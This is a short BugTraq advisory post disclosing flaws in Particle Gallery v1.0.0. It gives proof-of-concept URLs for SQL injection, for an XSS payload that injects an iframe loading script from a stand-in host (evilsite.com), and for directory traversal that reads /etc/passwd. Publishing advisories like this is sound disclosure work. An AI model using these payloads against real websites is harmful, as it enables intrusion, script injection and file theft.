BugTraq
Particle Gallery v1.0.0 Jun 05 2006 11:37PM
luny youfucktard com
Homepage:

http://www.particlesoft.net/particlegallery/

Effected files:

viewimage.php

viewalbum.php

SQL Injection:

http://www.example.com/viewimage.php?imageid='

XSS Vulnerability proof of concept:

http://www.example.com/viewimage.php?imageid=<iframe%20src=http://evilsi
te.com/scriptlet.html>

Possible Directory Traversal ?:

http://www.example.com/viewalbum.php?albumid=../../../../etc/passwd/

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus